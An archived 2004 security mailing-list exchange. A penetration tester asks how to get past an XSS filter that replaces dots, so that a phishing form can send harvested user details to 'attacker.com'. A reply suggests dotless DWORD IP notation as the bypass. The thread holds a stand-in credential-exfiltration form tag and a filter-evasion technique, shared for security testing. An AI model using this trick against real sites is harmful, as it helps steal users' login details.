WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "Harry Metcalfe" <harry () slaptop com>
Date: Tue, 1 Jun 2004 03:13:46 +0100
Hiya, Yes: Don't use a . in the target. You can specify an IP address in DWORD form, which has no periods. See the following page for a good description: http://www.tcp-ip.nu/tcp-ip/subpages/dotlessip/ It should be noted that this will not work in all browsers, and thus if the client's browser does not support this IP address notation, they will be invulnerable. Many browsers do support it though - Firefox being among them. I think IE5 does also. I have IE6 here and it doesn't work with that. HTH, Arta -----Original Message----- From: Calum Power [mailto:enune () fribble net] Sent: 29 May 2004 05:49 To: webappsec () securityfocus com Subject: Fullstop Substitution in XSS Hi all, As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_). Now, I'm trying trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any: <form target="http://attacker.com/path/to/script"> is of course being filtered into: <form target="http://attacker_com/path/to/script"> Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously). Any help would be appreciated. Cheers, Calum -- Calum Power Cultural Jammer Security Enthusiast Hopeless Cynic enune () fribble net http://www.fribble.net
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)